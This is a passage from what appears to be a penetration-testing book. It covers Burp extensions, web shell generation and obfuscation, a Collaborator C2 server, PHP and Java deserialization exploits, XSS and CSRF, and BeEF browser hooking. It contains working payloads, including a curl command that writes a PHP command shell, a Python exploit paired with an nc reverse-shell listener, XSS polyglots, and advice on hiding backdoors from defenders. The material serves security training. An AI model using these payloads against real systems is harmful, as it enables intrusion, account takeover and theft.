don't envy any security team charged with doing so. As attackers,
once again we are able to take full advantage of these limitations
and as I've shown in the earlier example, fully compromise the
application by exploiting a difficult-to-discover vulnerability.
This chapter will expose you to valuable tools and by the end, you
should be able to:
Extending Burp
Burp Suite is a fantastic attack proxy and it comes with some great
features straight out of the box. As mentioned in previous chapters,
Intruder is a flexible brute-forcing tool, Repeater allows us to inspect
and fine-tune attacks, and Decoder streamlines data manipulation.
What makes Burp great is the ability to expand functionality through
community-developed and community-maintained extensions.
PortSwigger, the creator of Burp Suite, also maintains an online
directory for extensions called the BApp Store. The BApp Store can
be accessed via the Extender tab in Burp Suite.
We can find Additional Scanner Checks in the BApp Store with the
Install button greyed out. The BApp Store page presents us with an
option to go and download Jython.
Figure 7.2: Burp Suite BApp Store page for Additional Scanner Checks
Note
Jython is available on http://www.jython.org/downloads.html as a
standalone JAR file.
Note
JRuby is available on http://jruby.org/download as a complete
JAR file.
Figure 7.4: The Install button is enabled after configuring environment prerequisites
Authentication and authorization
abuse
One of the most tedious application security tests is an
authentication or authorization check. The basic steps to verify for
this type of vulnerability go something like this:
Autorize will do the heavy lifting for us and we can quickly install it
through the Burp Suite interface.
Figure 7.5: Autorize in the BApp Store
Autorize can also help us find more serious vulnerabilities with the
second replayed request, which removes the Cookie header, making
it an anonymous request. If this request's response matches the
original's, an authentication bypass issue is present in the
application.
First, we need to capture the Cookie header and the session ID for a
user with low privileges. This can be captured by opening a new
browsing session and looking at the server response. We will be
traversing the application using an administrative account.
Autorize will start replaying requests once we click the enable button:
Figure 7.7: The Autorize Cookie configuration pane
It appears that while this page is hidden from regular users by a 403
error in the admin panel entry point, it is accessible directly and only
checks whether the user is logged in, and not whether they have
administrative privileges.
I've said this before but as penetration testers and red teamers, we
know time is not a luxury we share with the bad guys. Engagements
are often time-sensitive and resources are stretched thin. Copying
and pasting the Cookie header from Burp into the terminal to launch
a sqlmap attack doesn't seem like a big deal, but it adds up. What if
the target application has several potential SQL injection points?
What if you're testing three or four different applications that do not
share the same login credentials? Automation makes life easier and
makes us more efficient.
Note
The CO2 plugin can be downloaded from the BApp Store or from
GitHub at https://github.com/portswigger/co2.
Installing CO2 is as easy as any other BApp Store plugin and it adds
a few options to the context menu in the Target, Proxy, Scanner, and
other modules. Many of the requests made through Burp can be sent
directly to a few of the CO2 components. Doing so will fill in most of
the required parameters, saving us time and reducing the potential
for human error.
sqlmap helper
CO2 provides a sqlmap wrapper within the Burp user interface aptly
titled SQLMapper. If we spot a potential injection point, or perhaps
Burp's active scanner notified us of a SQL injection vulnerability, we
can send the request straight to CO2's SQLMapper component
using the context menu:
Figure 7.9: Sending the request to SQLMapper's context menu from CO2
Note
The Kali distribution comes with a fairly recent version of sqlmap
already installed, but the latest and greatest code can be cloned
from GitHub at https://github.com/sqlmapproject/sqlmap.
The Config button will allow us to point CO2 to the right binaries to
execute sqlmap from the user interface. The Run button will spawn a
new terminal with sqlmap and all of the options passed in.
Figure 7.10: CO2 SQLMap config popup
On Kali, the sqlmap tool is located in the /usr/bin folder and does
not have the .py extension. If you're working with the bleeding edge
from the GitHub repository, you may want to specify the full path.
First, we can clone the latest and greatest sqlmap code from GitHub
using the git clone command:
The Run button will launch a new terminal window and start sqlmap
with the selected options:
Figure 7.12: sqlmap running with the selected options
Note
sqlmap will save the session of each attack in a folder under the
home directory: ~/.sqlmap/output/[target]
root@kali:~/.sqlmap/output/c2.spider.ml
# tree
.
├── log
├── session.sqlite
└── target.txt
0 directories, 3 files
root@kali:~/.sqlmap/output
/c2.spider.ml#
Web shells
The CO2 Swiss Army knife also provides an easy way to generate
web shells for a number of server-side languages. If we manage to
upload a shell to one of these boxes, we need a simple, somewhat
secure shell to escalate privileges and ultimately reach our goal.
127.0.0.1,192.168.1.123
3. Click the Gen New Token button for a random token value:
To save the file somewhere on disk, click the Generate File button.
The contents of the generated shell will look like the following:
Figure 7.14: The Laudanum shell source code
We can pass this token using the laudtoken URL parameter and the
command to execute via laudcmd. Values for these parameters can
also be passed via POST.
It should be noted that even with the correct token in the URL, a
request from an unknown IP will be rejected with a 404 response.
Our client will appreciate the extra security checks; after all, we are
here to find vulnerabilities and not introduce new ones. It should go
without saying, but this is not foolproof; this file should be purged
during cleanup just like any other artifact we drop on the target.
With the proper external IP and the token in hand, we can gain
control of the shell using Burp Suite's Repeater module.
Note
PHP Obfuscator can be cloned from
https://github.com/naneau/php-obfuscator.
We can call the obfuscate tool with the obfuscate parameter, and
pass in the file to mangle, as well as the output directory:
root@kali:~/tools/phpobfs# bin/obfuscate obfuscate
~/tools/shells/ads.php ~/tools/shells/out/
Copying input directory /root/tools/shells/ads.php
to /root/tools/shells/out/
Obfuscating ads.php
root@kali:~/tools/phpobfs#
If we inspect the newly obfuscated ads.php file, we now see this blob
of code:
Some strings are still visible and we can see the IPs and token
values are still intact. The variables are changed to non-descriptive
random words, the comments are gone, and the result is really
compact. The difference in size between the two shells is also
significant:
It's not foolproof, but it should let us fly under the radar a bit longer.
PHP Obfuscate should work on all PHP code, including shells you
may choose to write yourself.
Burp Collaborator
In the previous chapter, we looked at finding obscure vulnerabilities
in applications that may not be obvious to attackers. If the application
does not flinch when we feed it unexpected input, it could be that it is
not vulnerable and the code properly validates input, but it could also
mean that a vulnerability exists but it's hidden. To identify these
types of vulnerabilities, we passed in a payload that forced the
application to connect back to our C2 server.
Note
The free version does not support Collaborator; however,
Chapter 6, Out-of-Band Exploitation, described the process and
how to build a C2 infrastructure that can be used for the same
purpose.
Note
Burp Collaborator takes several steps to ensure the data is safe.
You can read more about the whole process on
https://portswigger.net/burp/help/collaborator.
Service interaction
To see Collaborator in action, we can point the Burp Active Scanner
to a vulnerable application and wait for it to execute one of the
payloads generated, and perform a connect back to the public
Collaborator server burpcollaborator.net.
Note
The Damn Vulnerable Web Application is a good testing bed
for Collaborator: http://www.dvwa.co.uk/.
The Burp Suite client will check in periodically with the Collaborator
server to ask about any recorded connections. In the preceding
case, we can see that the application, vulnerable to command
injection, was tricked into connecting to the Collaborator cloud
instance by performing a DNS lookup on a unique domain.
Note
Once you close the Collaborator client window, the domains
generated will be invalidated and you may not be able to detect
out-of-band service interactions.
We can grab one of these domains and feed it to our custom attack.
The application accepts the request but does not respond with any
data. Our payload is a simple XSS payload designed to create an
iframe that navigates to the domain generated by the Collaborator
client.
"><iframe%20src=[collaborator-domain]/>
If the application is vulnerable, this exploit will spawn a new HTML
iframe, which will connect back to a server we control, confirming the
existence of a vulnerability.
Note
Collaborator can be a bit memory hungry and a micro-cloud
instance may not be enough for a production deployment.
Note
The first time you run the Collaborator server, it will prompt you to
enter your license in order to perform activation. This value is
stored in ~/.java/.userPrefs/burp/prefs.xml so make sure that
this file is properly protected and is not world-readable.
The Collaborator server is actually built into the Burp Suite attack
proxy. We can copy the Burp Suite Professional JAR file and launch
it from the command-line with the --collaborator-server switch:
root@spider-c2-1:~/collab# java -jar Burp
Suite_pro.jar --collaborator-server
[...]
This version of Burp requires a license key. To
continue, please paste your license key below.
VGhlcmUgYXJlIHRoZXNlIHR3byB5b3VuZyBmaXNoIHN3aW1taW
5nIGFsb25nLCBhbmQgdGhleSBoYXBwZW4gdG8gbWVldCBhbiBv
bGRlciBmaXNoIHN3aW1taW5nIHRoZSBvdGhlciB3YXksIHdoby
Bub2RzIGF0IHRoZW0gYW5kIHNheXMsICJNb3JuaW5nLCBib3lz
LCBob3cncyB0aGUgd2F0ZXI/IiBBbmQgdGhlIHR3byB5b3VuZy
BmaXNoIHN3aW0gb24gZm9yIGEgYml0LCBhbmQgdGhlbiBldmVu
dHVhbGx5IG9uZSBvZiB0aGVtIGxvb2tzIG92ZXIgYXQgdGhlIG
90aGVyIGFuZCBnb2VzLCAiV2hhdCB0aGUgaGVsbCBpcyB3YXRl
cj8i
You'll notice we had to specify the domain we'll be using along with
our public IP address. The log level is set to DEBUG until we can
confirm the server is functioning properly.
Note
It is a good idea to filter incoming traffic to these ports and
whitelist your and your target's external IPs only.
Now that the server is online, we can modify the Project options
and point to our private server, c2.spider.ml.
Figure 7.25: Private Collaborator server configuration
The SMTP and SMTPS checks may fail depending on your ISP's
firewall, but enterprise clients should be able to reach it. The
important part is the DNS configuration. If the target can resolve the
randomly generated subdomain for c2.spider.ml, they should be
able to connect outbound if no other egress filtering takes place.
You'll also notice that the enforced HTTPS connection failed as well.
This is because by default, Collaborator uses a self-signed wildcard
certificate to handle encrypted HTTP connections.
To get around this issue for targets whose trusted root certificate
authorities we don't control, we'd have to install a certificate signed
by a public certificate authority.
We've also looked at an easy way to obfuscate code that may end
up on a target system. When dropping a custom shell on a server,
it's a good idea to hide its true function. A passing blue teamer may
not look twice if the code looks overly complex. We've used tools to
quickly transform our generated backdoor into a less conspicuous
output.
Abusing deserialization
Exploiting deserialization relies on built-in methods, which execute
automatically when an object is instantiated or destroyed. PHP, for
example, provides several of these methods for every object:
__construct()
__destruct()
__toString()
__wakeup()
…and more!
array(
'database' => 'users',
'host' => '127.0.0.1'
)
When the source code is compiled and executed by the PHP engine,
the array object is stored in a memory structure somewhere in RAM
that only the processor knows how to access. If we wish to transfer
array to another machine through a medium such as HTTP, we have
to find all the bytes in memory that represent it, package them, and
send them using a GET request or similar. This is where serialization
comes into play.
The serialize() function in PHP will do just that for us: find the array
structure in memory and return a string representation of it. We can
test this by using the php binary on our Linux machine, and with the -
r switch we can ask it to serialize our array, and return a
representative string. The PHP code will echo the results
to the screen:
The code can be a bit daunting to non-developers, but it's not very
complicated at all. The WriteLock class has two public functions (or
methods) available: write() and __wakeup(). The write() function
will write the string app_in_use to the /tmp/lockfile file on the disk
using PHP's built-in file_put_contents function. The __wakeup()
method will simply sanity-check the properties and execute the
write() function in the current object ($this). The idea here is that
the lock file, /tmp/lockfile, will automatically be created when the
WriteLock object is recreated in memory by deserialization.
First, we can see how the WriteLock object looks when it is serialized
and ready for transmission. Remember that __wakeup() will only
execute on deserialization, not when the object is instantiated.
Let's execute the serialize.php file using the php interpreter and
observe the result:
O:9:"WriteLock":2:{
s:4:"file";
s:13:"/tmp/lockfile";
s:8:"contents";
s:10:"app_in_use";
}
The first few bytes denote an object (o) instantiated from the
WriteLock class, which contains two properties, along with their
respective values and lengths. There is one thing to note: for private
class members, the names are prepended with the class name
wrapped in null bytes. If the WriteLock properties $file and
$contents were private, the serialized object would look like this:
O:9:"WriteLock":2:{
s:4:"\x00WriteLock\x00file";
s:13:"/tmp/lockfile";
s:8:"\x00WriteLock\x00contents";
s:10:"app_in_use";
}
Note
Null bytes are not normally visible in standard output. In the
preceding example, the bytes were replaced by their hex
equivalent \x00 for clarity. If our payload includes private
members, we may need to account for these bytes when
transmitting payloads over mediums that interpret null bytes as
string terminators. Typically, with HTTP we can escape null bytes
using the percent sign preceding the hex representation
of null, 00. Instead of \x00, for HTTP, we'd simply use %00.
Let's run a simple web server and bring the WriteLock application to
life. The php interpreter can function as a standalone development
server with the -S parameter, similar to Python's SimpleHTTPServer,
with the added benefit of processing .php files before serving them.
We can use the php command to listen on the local system on port
8181, as follows:
root@kali:/var/www/html/lockapp# php -S
0.0.0.0:8181
Listening on http://0.0.0.0:8181
Document root is /var/www/html/lockapp
Press Ctrl-C to quit.
The serialized payload will look like this, again indented to make it
more readable:
O:9:"WriteLock":2:{
s:4:"file";
s:31:"/var/www/html/lockapp/shell.php";
s:8:"contents";
s:100:"<?php if (md5($_GET['password']) ==
'5d58f5270ce02712e8a620a4cd7bc5d3') {
system($_GET['cmd']); } ?>";
}
Note
We've updated the value for file and contents, along with the
appropriate string length, 31 and 100 respectively, as shown in
the preceding code block. If the length specified does not match
the actual length of the property value, the attack will fail.
Our serialized data contains single quotes, which can interfere with
the execution of curl through the bash prompt. We should take care
to escape them using a backslash (\') as follows:
root@kali:~# curl -G http://0.0.0.0:8181/index.php
--data-urlencode $'lock=O:9:"WriteLock":2:
{s:4:"file";s:31:"/var/www/html/lockapp/shell.php"
;s:8:"contents";s:100:"<?php if
(md5($_GET[\'password\']) ==
\'5d58f5270ce02712e8a620a4cd7bc5d3\') {
system($_GET[\'cmd\']); } ?>";}'
Lock initiated.
Figure 8.6: The shell successfully executing the id program and displaying its result
Note
Composer can be found at https://getcomposer.org/.
Attacking custom protocols
Not unlike PHP, Java also provides the ability to flatten objects for
easy transmission or storage. Where PHP-serialized data is simple
strings, Java uses a slightly different approach. A serialized Java
object is a stream of bytes with a header and the content split into
blocks. It may not be easy to read, but it does stand out in packet
captures or proxy logs as Base64-encoded values. Since this is a
structured header, the first few bytes of the Base64 equivalent will be
the same for every stream.
Note
DeserLab and Nick Bloor's research can be found on
https://github.com/NickstaDB/.
To start a new instance of DeserLab, we can call the JAR file with
the -server parameter, and specify the IP and port to listen on. For
simplicity, we will be using deserlab.app.internal to connect to the
vulnerable application once it is up and running. We will use the java
binary to launch the DeserLab server component on the DeserLab
target machine.
Protocol analysis
DeserLab is a straightforward application that provides string
hashing services and is accessible by a custom client, built-in to the
DeserLab.jar application file. With the DeserLab server component
running on the target machine, we can launch the client component
on our attacker machine, kali, with the -client switch, as follows:
The application server component terminal log echoes the other side
of the interaction. Notice the client-server hello and name message
exchange; this will be important when we craft our exploit.
While the data may be a bit hard to read, each byte has a purpose.
We can see the familiar ac ed header and the various inputs the
client has sent, such as name and string. You'll also notice that the
string value is a serialized HashRequest object. This is a Java class
implemented by both the server and the client. Serialization is used
to instantiate an object that will calculate the hash of a given input
and store it in one of its properties. The packets we've just captured
are the serialized representation of this object being transmitted from
the client to the server and vice versa. The server-serialized object
also contains an extra property: the generated hash.
[...]
oos = new
ObjectOutputStream(clientSock.getOutputStream());
//Generate a hash
request.setHash(generateHash(request.getData()));
oos.writeObject(request);
[...]
We see that the data is read in from the client using the
ObjectInputStream (ois) object. This is just a fancy term for the data
coming in from the client, which we've observed in the Wireshark
packet capture to be the serialized HashRequest object. The next step
is to attempt to cast the data read from ois to a HashRequest data
structure. The reference to this new HashRequest object is then stored
in the request variable, which can then be used as a normal object in
memory. The server will get the input value of the string to be
deserialized by calling request's getData() method, computing the
hash, and storing it back into the object using setHash(). The setHash
method is made available by the HashRequest class and all it does is
populate a hash property within the object. The data is then
serialized and written back to the network stream using
writeObject().
Deserialization exploit
Java deserialization attacks are possible because Java will execute
a variety of methods in its quest to deserialize an object. If we control
what properties these methods reference, we can control the
execution flow of the application. This is POP and it is a code reuse
attack similar to return-oriented programming (ROP). ROP is used
in exploit development to execute code by referencing existing bytes
in memory and taking advantage of the side effect of the x86 return
instruction.
Spring
Groovy
Commons Collections
Jython
...and many more!
Note
ysoserial's source code and JAR files can be downloaded from
https://github.com/frohoff/ysoserial.
We know that the target application uses the Groovy library because
we have access to the JAR file and its source. This isn't always true
with enterprise applications, however, and we may not always have
access to the source code during an assessment. If the vulnerable
application is running server-side and our only interaction with it is
via an HTTP GET request, we'd have to rely on a separate information
leak vulnerability to know what library to target for the POP gadget
chain generation. Of course, the alternative is to simply try each
known POP gadget chain until one succeeds. This is not as elegant
and it is very noisy, but it may do the trick.
The indented lines are the packets received from the server and
everything else is what we've sent with our client:
Once again, we can see the ac ed magic bytes starting the stream,
followed by the protocol hello packets: 0xF0 0x00 0xBA 0xAA, and
finally the protocol version 0x01 0x01. Each packet sent by either the
server or the client will be preceded by 0x77, indicating a block of
data is coming in and the length of that block (0x02 in the case of the
protocol version).
It's not terribly important that we understand what each byte means
because we can clearly see where the serialized payload begins.
The 0x73 and 0x72 bytes (which are the equivalent of the lowercase
letters s and r respectively) represent the start of the serialized
object, as shown in the following output:
To feed a custom payload and exploit the application, we will write a
Python script that will connect to the DeserLab application and:
First, we will import the Python socket library and set a couple of
variables that describe our target:
import socket
target_host = 'deserlab.app.internal'
target_port = 4321
target = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
target.connect((target_host, target_port))
At this point, our script will emulate the DeserLab client, and in order
to successfully connect and be able to send our exploit code, we
have to perform a few steps first. Recall that the client sends a few
required bytes, including the hello packet and client version.
We will use the send() and recv() methods to send and read the
responses, so that the communication can move along. Since some
bytes can be outside of the ASCII readable range, we should escape
them using their hex equivalent. Python allows us to do this using a
backslash (\) and x prefix to the hex bytes. For example, the
character A can be represented in Python (and other languages)
using \x41.
After we perform a send, we should also receive any data sent from
the server. We don't need to store the server response, but we do
have to receive it to clear the buffer and allow the socket
communication to continue.
First, we will send the 0xAC 0xED magic bytes, followed by the hello
packet, and finally the expected client version. We have to prefix the
hello and version packets with the 0x77 byte, followed immediately
by the data length. For example, the client version being 0x01 0x01
would need to be prefixed by 0x77 (indicating a data packet), and by
0x02 (the data packet length).
The following code will send the magic bytes, hello packet, and client
version:
We also have to send the client name, which can be arbitrary, but it
is required. We just have to make sure the 0x77 prefix and the data
length are accurate:
Finally, we have to strip the magic bytes from the payload itself, as
we've already sent these. The server expects the object without this
data. Python allows us to remove the first four bytes using the [4:]
array notation:
import socket
target_host = 'deserlab.app.internal'
target_port = 4321
target = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
target.connect((target_host, target_port))
root@
spider-c2-1:~# nc -lvp 443
listening on [any] 443 ...
All that's left to do is to run the Python script on our attacker machine
and hope for the best:
gid=0(root) groups=0(root)
Summary
In this chapter, we've looked at another way that user input can be
abused to execute arbitrary code on vulnerable applications.
Serialization is very useful in modern applications, especially as they
become more complex and more distributed. Data exchange is
made easy, but sometimes at the expense of security.
In this chapter, we will explore client-side attacks, with a heavy emphasis on XSS. We will
also look at Cross-Site Request Forgery (CSRF) attacks and discuss the implications of
the same-origin policy (SOP). Next, we will look at ways to weaponize XSS
vulnerabilities using BeEF.
We will spend quite a bit of time on BeEF, as it makes XSS attacks viable. It allows us to
easily perform social engineering attacks to execute malicious native code, implement a
keylogger, persist our access, and even tunnel traffic through the victim's browser.
SOP
Consider a scenario where a target is logged into their Gmail account (mail.google.com) in
one of the open browser tabs. In another tab, they navigate to a different site, on a
different domain, which contains attacker code that wants access to that Gmail data.
Maybe they were socially engineered to visit this particular site or maybe they were
redirected there through a malicious advertising (malvertising) campaign on a well-known
news site.
The attacker code may try to open a connection to the mail.google.com domain, and
because the victim is already authenticated in the other browser tab, the code should be
able to read and send emails as well by forging requests to Gmail. JavaScript provides all
the tools necessary to accomplish all of this, so why isn't everything on fire?
The answer, as we will see in detail shortly, is because of the SOP. The SOP prevents this
exact attack and, unless the attacker can inject their code directly into mail.google.com,
they will not be able to read any of its sensitive information.
The SOP was introduced back in the Netscape days because the potential for abuse was
very real without it. Simply put, the SOP restricts sites from accessing information from
other sites, unless the origin of the request source is the same as the destination.
There is a simple algorithm to determine whether the SOP has been breached. The
browser will compare the schema, domain, and port of the source (origin) site to that of the
destination (target) site and if any one item doesn't match, read access will be denied.
In our earlier example, the target site in the attack would be the following URI:
https://mail.google.com/mail/u/0/#inbox, which would translate to the following origin triple:
Attacker code running on https://www.cnn.com/ would be denied read access because the
domain doesn't match:
This makes sense from a defense perspective. The scenario we outlined earlier would be
a nightmare if not for the SOP. However, if we look closely at web apps on the internet,
we'll notice that almost all include content such as images, stylesheets, and even
JavaScript code.
Sharing resources cross-origin or cross-site has its benefits for the application. Static
content can be offloaded to CDNs, which are typically hosted on other domains (think
Facebook's fbcdn.net, for example), allowing for greater flexibility, speed, and ultimately,
cost savings while serving users.
The SOP does allow access to certain types of resources cross-origin to ensure the web
functions normally. After all, when the focus is user experience, a security policy that
makes the application unusable is not a great security policy, no matter how secure it may
actually be.
The SOP will permit the following types of cross-origin objects to be embedded into the
origin from any other site:
Images
Stylesheets
Scripts (which the browser will gladly execute!)
Inline frames (iframe)
We can include images from our CDN, and the browser will download the image bytes and
render them onto the screen. We cannot, however, read the bytes programmatically using
JavaScript. The same goes for other static content that is allowed by the SOP. We can, for
example, include a stylesheet with JavaScript, but we cannot read the actual contents of
the stylesheet if the origin does not match.
This is true for iframe elements as well. We can create a new iframe object and point it to
an arbitrary URL, and the browser will gladly load the content. We cannot, however, read
the contents if we are in breach of the SOP.
We can see that the frame source (frame.src) matches the parent origin triple exactly and
when we try to read the contents of the iframe element's head
using frame.contentDocument, we succeed. The SOP was not violated.
Figure 9.2: Creating a cross-origin frame and attempting to access its contents fails
The Bing search app loaded just fine, as we can see in the rendered site on the right, but
programmatically, we cannot read the contents because that violates the SOP.
JavaScript is also accessible cross-origin and this is usually a good thing. Offloading your
JavaScript libraries to a CDN can reduce load times and bandwidth usage. CDNJS is a
prime example of how sites can benefit from including JavaScript from a third-party.
Note
CDNJS is an open-source web CDN providing almost every conceivable JavaScript
library. More information on this great service can be found at https://cdnjs.com/.
Any other type of data that we may try to load cross-origin using JavaScript would be
denied. This includes fonts, JSON, XML, or HTML.
Cookies deserve a special mention when talking about the SOP. Cookies are typically tied
to either the domain or a parent domain, and can be restricted to secure HTTP
connections. Browsers can also be instructed to disallow JavaScript access to certain
cookies, to prevent attacks such as XSS from extracting session information.
The cookie policy is fine-tuned by the application server when the cookie is initially set,
using the Set-Cookie HTTP response header. As I said earlier, unless otherwise specified,
cookies are typically bound to the application domain name. Wildcard domains can also be
used, which would instruct the browser to pass the cookies for requests to all subdomains
as well.
Applications will leverage cookies to manage authentication and user sessions. A unique
value will be sent to the client once they've successfully logged in, and the browser will
pass this value back to the application for all subsequent requests, provided the domain
and path match what was specified when the cookie was initially set.
The side effect of this behavior is that a user only has to login to the application once and
the browser will maintain the authenticated session by passing cookies in the background
with every request. This greatly improves user experience but can also be abused by
attackers.
Cross-origin resource sharing
In the age of microservices, where web application components are
decoupled and run as separate instances on totally different
domains, the SOP presents some challenges.
Note
CORS is well-documented on the Mozilla Developer Network:
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
root@spider-c2-1:~# curl -I
https://api.spotify.com/v1/albums
HTTP/2 401
www-authenticate: Bearer realm="spotify"
content-type: application/json
content-length: 74
access-control-allow-origin: *
access-control-allow-headers: Accept,
Authorization, Origin, Content-Type, Retry-After
access-control-allow-methods: GET, POST, OPTIONS,
PUT, DELETE, PATCH
access-control-allow-credentials: true
access-control-max-age: 604800
via: 1.1 google
alt-svc: clear
root@spider-c2-1:~#
This particular API is public and, therefore, will inform the client that
all origins are allowed to read response contents. This is done with
the value for Access-Control-Allow-Origin set to a wildcard: *.
Private APIs will typically use a more specific value, such as an
expected URL.
While this may not sound as great as executing code on the actual
application server, XSS attacks can be devastating when used in
targeted attacks.
Reflected XSS
The more common type of XSS vulnerability is the reflected or non-
persistent kind. A reflected XSS attack happens when the
application accepts input from the user, either via parameters in the
URL, body, or HTTP headers, and it returns it back to the user
without sanitizing it first. This type of attack is referred to as non-
persistent because once the user navigates away from the
vulnerable page, or they close the browser, the exploit is over.
Reflected XSS attacks typically require some social engineering due
to the ephemeral nature of the payload.
Note
To showcase XSS attacks, we will once again use the badguys
project from Mike Pirnat. The web application code can be
downloaded from https://github.com/mpirnat/lets-be-bad-guys.
The application will take the user-inputted value and pre-fill a text
field somewhere on the page. This is common behavior for login
forms, where the user may enter the wrong password and the page
will reload to display an error message. In an attempt to improve
user experience, the application automatically fills the username field
with the previously inputted value. If the username value is not
sanitized, bad things can happen.
jaVasCript:/*-/*'/*\'/*'/*"/**/(/*
*/oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRi
pt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
The alert box pops up after the polyglot inserts an <svg> tag with the
onload property set to execute alert(). This is possible because the
application reflected the payload without removing dangerous
characters. The browser interpreted the first double-quote as part of
the input field, leading to the vulnerability.
Persistent XSS
A persistent XSS, also called stored XSS, is similar to a reflected
attack in that the input is not sanitized and is eventually reflected
back to a visiting user. The difference, however, is that a persistent
XSS is typically stored in the application's database and presented
to any user visiting the affected page. Stored XSS usually does not
require us to trick the user into visiting the vulnerable page using
a specially crafted URL, and could speed things up if the target user
does not use the application frequently.
Update their profile to include the phrase "but most of all, Samy
is my hero"
Send a friend request to Samy Kamkar's profile
At first glance, this seemed fairly harmless, and the few users who
visited Samy's profile would be mildly annoyed and eventually move
on. What made Samy Kamkar famous, however, was the fact that
the victim's profile was also updated to include the same JavaScript
payload that the victim executed while browsing the infected profile.
This turned the XSS attack into an XSS worm.
Note
A full explanation of how this clever attack was carried out,
including the final payload, can be found on Samy Kamkar's
personal site: https://samy.pl/myspace/tech.html.
DOM-based XSS
This particular type of XSS attack happens when the application's
client-side code reads data from the DOM and uses it in an unsafe
manner.
The best way to illustrate the impact of DOM XSS is with a simple
vulnerable application.
This application will scan the document URL for the position of the
name parameter using the document.URL.indexOf() function. It will
then grab the text starting just after name= using the
document.URL.substring() function and store the value in the name
variable.
On line 11, the application will walk the DOM for the span element
welcome. Line 12 is where the magic happens, also known as the
sink. The application will fill the contents of the span element with
that of the name URL parameter fetched earlier, using the innerHTML
property of the welcome object.
Figure 9.5: The DOM is updated to include the name from the URL
The span element in the DOM was updated with the value passed via
the URL and everything looks good. The application provides
dynamic page content without the need for server-side programming.
Another issue with this particular piece of code is that the URL GET
parameters are not safely parsed. It uses string functions to walk the
entire URL and fetch arbitrary data.
Our payload URL to exploit this DOM XSS will look like this:
http://c2.spider.ml/welcome.html#name=
<svg/onload=alert(1)>
The application client-side code works just fine and inserts our XSS
payload right into the DOM:
Figure 9.6: DOM-based XSS successfully executing
If we inspect the application server log, we can see that our payload
was never sent over the wire:
As attackers, we've done some digging and realized that the email
application provides a way to update the password recovery email
through the profile page: http://email.site/profile/.
http://email.site/profile/update?
[email protected]
In our malicious site, we embed an img tag with the source pointing
to the profile update URL containing our email address as the new
value.
When the user visits our malicious site, the image will attempt to load
by making an authenticated GET request to the target application,
updating the recovery email for the victim on the email application.
We now have the ability to request a password reset for the victim's
account and login to the email site directly.
CSRF tokens should be tied to the user session and if that session is
destroyed, the tokens should go with it. If tokens are global,
attackers can generate them on their own accounts and use them to
target others.
First of all, we would submit an XSS payload into our own profile
name and save it for later. Then, we could build a malicious site that
performs the following operations in order:
BeEF is a great tool that was created by Wade Alcorn to allow for the
easy exploitation of XSS vulnerabilities.
Note
Installing BeEF is straightforward and it is available on GitHub:
https://github.com/beefproject/beef. BeEF is also installed on Kali
Linux by default. Although, in some cases, it's better to have
it running in your C2 server in the cloud.
We can clone the latest version from the GitHub repository using the
git clone command:
The source comes with an install script, which will setup the
environment for us. Inside the beef folder, execute the install script:
root@spider-c2:~/beef# ./install
[WARNING] This script will install BeEF and its
required dependencies (including operating system
packages).
Are you sure you wish to continue (Y/n)? y
[INFO] Detecting OS...
[INFO] Operating System: Linux
[INFO] Launching Linux install...
[INFO] Detecting Linux OS distribution...
[INFO] OS Distribution: Debian
[INFO] Installing Debian prerequisite packages…
[...]
beef:
[...]
credentials:
user: "admin"
passwd: "peanut butter jelly time"
[...]
restrictions:
# subnet of IP addresses that can hook to the
framework
permitted_hooking_subnet: "172.217.2.0/24"
# subnet of IP addresses that can connect to
the admin UI
permitted_ui_subnet: "196.247.56.62/32"
# HTTP server
http:
debug: false #Thin::Logging.debug, very
verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "443"
public: "c2.spider.ml"
[...]
https:
enable: true
key:
"/etc/letsencrypt/live/spider.ml/privkey.pem"
cert:
"/etc/letsencrypt/live/spider.ml/cert.pem"
The root of the configuration file is beef with indented lines delimiting
subnodes. For example, the path beef.credentials.user path would
return the admin value once the configuration file is parsed.
Note
Let's Encrypt provides free domain-validated certificates for
hostnames and even wildcards. More information can be found
at https://letsencrypt.org/.
The BeEF C2 panel is accessible via the URL displayed in the BeEF
launcher output:
https://[beef.http.public]:
[beef.http.port]/ui/panel
The user experience is a bit unorthodox but quick to get used to:
Figure 9.10: The BeEF C2 server control panel
On the right-hand side of the hooked browsers' history, you'll find the
landing page (or Getting Started), the C2 server logs (Logs), and
the selected victim's browser control tab (Current Browser). Of
interest is the browser control, which includes sub-tabs for details,
logs, and the modules, or commands.
There are many modules available and some work better than
others. The effectiveness of the module (command) you choose
really depends on the browser version, the victim, and how
technologically savvy they are. In the coming sections, we will look at
the more successful attack modules in an attempt to compromise the
target or harvest credentials.
Hooking
With the BeEF C2 server running in the cloud, we have exposed two
important URLs:
If we are trying to hide from the blue team, it may be best to move
this file to something less conspicuous than c2.spider.ml/hook.js,
but for the sake of this chapter, we will hook victims using this URL.
The first option is simple; we can close the value property with a
double-quote and the input element with an angled bracket, followed
by our malicious script tag:
The resulting HTML code, once the XSS payload is reflected back,
will silently download and execute our hook code, giving us access
to the browsing session. The async keyword will ensure that the hook
is downloaded asynchronously and does not slow down the page
load, which could tip off the victim that something is amiss.
The trailing unfinished <span> will ensure that the remainder of the
original HTML code does not show up on the page, giving it a bit
more of a clean look.
The first line will create a blank object representing a script tag. Just
as we did with the src= HTML tag property, in JavaScript, we can
point the source of the script to our hook code. At this point, no
actual code is downloaded or executed. We have created a benign
DOM object. To weaponize, we can use the append function to add it
